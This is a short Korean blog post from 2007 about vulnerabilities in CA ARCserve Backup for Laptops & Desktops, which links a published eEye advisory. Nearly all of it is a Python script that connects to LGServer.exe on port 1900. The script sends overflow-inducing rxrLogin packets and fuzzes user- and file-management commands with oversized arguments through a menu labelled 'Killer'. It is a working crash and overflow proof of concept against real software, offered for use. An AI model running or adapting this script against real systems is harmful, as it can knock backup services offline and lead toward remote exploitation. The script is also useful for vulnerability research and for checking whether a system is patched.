Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops

리버스 엔지니어링 2007.10.22 11:31

아주 오래전 우연히 발견한 버그...
http://research.eeye.com/html/advisories/published/AD20070920.html

거의 일년이 다되어서 포스팅 된듯하다.
간단히 퍼저를 만들어 보자면 다음과 같다.

#CA BrightStor LGServer.exe Fuzzer
import os
import sys
import socket
import re
import time

def MakeCommandStr(command,arguments):
  body=command
  for argument in arguments:
   body+="~~"+str(argument)
  return "%.10d"%len(body)+body

def FuzzyCommand(target,command_info):
 debug=2
 sockAddr = (target, 1900)
 tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 tsock.settimeout(3)
 tsock.connect(sockAddr)
 packets=[]
 packets.append(MakeCommandStr(command_info[0],["A"*3000]))
 for packet in packets:
  if debug>0:
   print "="*80
   print "Sending: ",packet
  tsock.send(packet)
  response = tsock.recv(1024)
  if debug>0:
   print "Got: ",response
   print "\n\n"
 tsock.close()

def SendRXRequests(target,method='Passwd Integer Overflow',Command="",argument_list=None):
 sockAddr = (target, 1900)
 tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 tsock.settimeout(10)
 tsock.connect(sockAddr)
   
 packets=[]
 if method=='Login Overflow':
  passwd_str="7631F40AA4F38B3007EBA24153F08EDB02"
  packets.append(MakeCommandStr("rxrLogin",["administrator"+"A"*1000,len(passwd_str)]))
  packets.append(passwd_str)
 elif method=='Passwd Integer Overflow':
  packets.append(MakeCommandStr("rxrLogin",["administrator","18"]))
  packets.append("000000000000000000")
 elif method=='Passwd Test':
  passwd_str="7631F40AA4F38B3007EBA24153F08EDB02"
  packets.append(MakeCommandStr("rxrLogin",["administrator",str(len(passwd_str))]))
  packets.append(passwd_str)
 elif method=='Passwd Stack Overflow':
  passwd_str="A"*4*5000+"02"
  packets.append(MakeCommandStr("rxrLogin",["administrator",str(len(passwd_str))]))
  packets.append(passwd_str)
 elif method=='Passwd Length Integer Overflow':
  #Not working well
  passwd_str="AAAA"
  packets.append(MakeCommandStr("rxrLogin",["administrator",0xffffffff]))
  packets.append(passwd_str)
 elif method=='Fuzzying':
  packets.append(MakeCommandStr(Command,argument_list))
 
 for packet in packets:
  print "="*80
  print "Sending: ",packet
  tsock.send(packet)
  response = tsock.recv(1024)
  print "Got: ",response
  print "\n\n"
   
 tsock.close()

if __name__ == '__main__':
 try:
  target = sys.argv[1]
 except IndexError:
  print 'Usage: %s <target>' % sys.argv[0]
  sys.exit(-1)
 
 Methods=[]
 Methods.append(['Login Overflow','',[]])
 Methods.append(['Passwd Stack Overflow','',[]])
 Methods.append(['Passwd Integer Overflow','',[]])
 #Methods.append(['Passwd Length Integer Overflow','',[]])
 Methods.append(['Fuzzying',"rxsClearPassword",["A"*3000]])
 Methods.append(['Fuzzying',"rxsSetActive",["A"*3000]])
 Methods.append(['Fuzzying',"rxsRenameUser",["A"*3000,"A"*3000]])
 Methods.append(['Fuzzying',"rxsDeleteUser",["A"*3000]])
 Methods.append(['Fuzzying',"rxsSetProtected",["A"*3000,"A"*3000]])
 Methods.append(['Fuzzying',"rxsSetupRestoreUser",["A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000]])
 Methods.append(['Fuzzying',"rxsDeleteFile",["A"*3000]])
 Methods.append(['Fuzzying',"rxcReadBackupSetList",["A"*3000]])
 Methods.append(['Fuzzying',"rxcCriticalSection",["A"*3000]])
 Methods.append(['Fuzzying',"rxsGetUserInfo",["A"*3000]])

 while 1:
  number=0

  print '='*50
  print 'BrightStor ARCserve Backup for Laptops and Desktops Killer:'
  print 'CA BrightStor LGServer.exe Fuzzer'
  print ''
  for [type,func,arg] in Methods:
   number+=1
   print number,type,func
  print ''
  print 0,'Exit'
  print ''
  print ''
   
  method_number=input("Which method do you want?")
  try:
   print int(method_number)
   if method_number==0:
    break
   SendRXRequests(
    target,
    method=Methods[method_number-1][0],
    Command=Methods[method_number-1][1],
    argument_list=Methods[method_number-1][2])
  except:
   pass

신고

티스토리 툴바